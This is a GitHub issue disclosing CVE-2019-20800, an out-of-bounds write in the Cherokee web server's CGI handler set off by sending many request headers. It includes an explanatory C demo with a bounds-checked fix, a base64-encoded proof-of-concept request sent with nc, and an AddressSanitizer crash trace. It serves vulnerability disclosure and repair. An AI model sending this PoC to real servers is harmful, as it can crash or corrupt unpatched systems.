CVE-2019-20800: CGI Handler too many headers · Issue #1224 · cherokee/webserver

In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many “Host: 127.0.0.1” headers.


struct cherokee_handler_cgi_t (handler_cgi.h) consists of a fixed-size array (char *envp[ENV_VAR_NUM]) for environment variables. Sending a request with a lot of headers causes int envp_last to be incremented to a value greater than ENV_VAR_NUM, resulting in reading outside the array.

handler_cgi.c:

310     cgi->envp[cgi->envp_last] = entry;
311     cgi->envp_last++;
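As an added example (not Cherokee's code, and not the project's actual fix), the store-then-increment pattern from lines 310 and 311 is shown beside a bounds-checked variant. Note that the CVE text and the ASAN report below ("The signal is caused by a WRITE memory access") both describe the store at line 310 as an out-of-bounds write, so the check has to happen before the store, not after the increment. The small ENV_VAR_NUM, the ret_t values, the canary slot standing in for whatever follows envp[] in the real struct, and the repeated HTTP_HOST entries are all constructed for this demo.

```c
/* Added example, not Cherokee's code: unchecked envp append (the shape of
 * handler_cgi.c:310-311) next to a bounds-checked variant. ENV_VAR_NUM,
 * ret_t, the canary slot and the header list are constructed for the demo. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ENV_VAR_NUM 8   /* kept small on purpose; Cherokee's real value is larger */

typedef enum { ret_ok = 0, ret_error = -1 } ret_t;

/* Stand-in for whatever memory follows envp[] in the real struct. */
static char canary_marker;
#define CANARY (&canary_marker)

typedef struct {
    /* ENV_VAR_NUM slots plus one extra slot holding CANARY, so the single
     * out-of-bounds store below lands inside this demo's own allocation
     * instead of running off the end of the real struct as in the ASAN trace. */
    char **envp;
    int    envp_last;
} cgi_env_t;

static cgi_env_t *cgi_env_new(void)
{
    cgi_env_t *cgi = calloc(1, sizeof *cgi);
    if (cgi == NULL) abort();
    cgi->envp = calloc(ENV_VAR_NUM + 1, sizeof(char *));
    if (cgi->envp == NULL) abort();
    cgi->envp[ENV_VAR_NUM] = CANARY;
    return cgi;
}

static void cgi_env_free(cgi_env_t *cgi)
{
    /* Only slots that were actually written hold malloc'ed entries. */
    for (int i = 0; i < cgi->envp_last && i <= ENV_VAR_NUM; i++)
        free(cgi->envp[i]);
    free(cgi->envp);
    free(cgi);
}

/* "NAME=value" string for one header, as a CGI environment entry. */
static char *make_entry(const char *name, const char *val)
{
    size_t len = strlen(name) + 1 + strlen(val) + 1;
    char *entry = malloc(len);
    if (entry == NULL) abort();
    snprintf(entry, len, "%s=%s", name, val);
    return entry;
}

/* Vulnerable shape: store, then increment, with no check against ENV_VAR_NUM. */
static void add_env_pair_unchecked(cgi_env_t *cgi, const char *name, const char *val)
{
    cgi->envp[cgi->envp_last] = make_entry(name, val);
    cgi->envp_last++;
}

/* Hardened shape: refuse the entry once the table is full. The last slot is
 * reserved because execve() needs envp to end in a NULL pointer. */
static ret_t add_env_pair_checked(cgi_env_t *cgi, const char *name, const char *val)
{
    if (cgi->envp_last >= ENV_VAR_NUM - 1)
        return ret_error;
    cgi->envp[cgi->envp_last] = make_entry(name, val);
    cgi->envp_last++;
    return ret_ok;
}

/* Feed n repeated "Host: 127.0.0.1" headers through the unchecked path and
 * report whether the slot just past the array was overwritten (1) or not (0).
 * n > ENV_VAR_NUM + 1 would be a real heap overflow, so it is refused (-1). */
int unchecked_clobbers_canary(int n_headers)
{
    if (n_headers > ENV_VAR_NUM + 1)
        return -1;
    cgi_env_t *cgi = cgi_env_new();
    for (int i = 0; i < n_headers; i++)
        add_env_pair_unchecked(cgi, "HTTP_HOST", "127.0.0.1");
    int clobbered = (cgi->envp[ENV_VAR_NUM] != CANARY);
    cgi_env_free(cgi);
    return clobbered;
}

/* Same headers through the checked path: returns how many were accepted,
 * or -1 if the canary was touched (it never is). */
int checked_accepts(int n_headers)
{
    cgi_env_t *cgi = cgi_env_new();
    int accepted = 0;
    for (int i = 0; i < n_headers; i++)
        if (add_env_pair_checked(cgi, "HTTP_HOST", "127.0.0.1") == ret_ok)
            accepted++;
    int intact = (cgi->envp[ENV_VAR_NUM] == CANARY);
    cgi_env_free(cgi);
    return intact ? accepted : -1;
}

int main(void)
{
    printf("unchecked, %d headers: canary clobbered = %d\n", ENV_VAR_NUM + 1,
           unchecked_clobbers_canary(ENV_VAR_NUM + 1));
    printf("checked, %d headers: accepted = %d\n", ENV_VAR_NUM * 4,
           checked_accepts(ENV_VAR_NUM * 4));
    return 0;
}
```

The demo deliberately sends only one header past the limit on the unchecked path; with the real server every extra header is another pointer-sized store past the end of the allocation, which is why the PoC below uses far more than ENV_VAR_NUM of them. Rejecting the entry (rather than silently dropping it) lets the handler fail the request instead of spawning the CGI with a truncated environment.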

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQp
Ib3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDQyOTQ5NjcyOTUuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
    #0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
    #1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
    #2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
    #3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
    #4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
    #5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
    #6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
    #0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

==10864==ABORTING

Setup:

  • Ubuntu 18.04 64 bit

  • source code from github, commit 9a75e65

  • build command:

ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
  • files in webroot: mkdir -p /var/www/test{1..20}; for i in $(seq 1 20); do echo test > /var/www/test$i/test.html; done
  • configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust
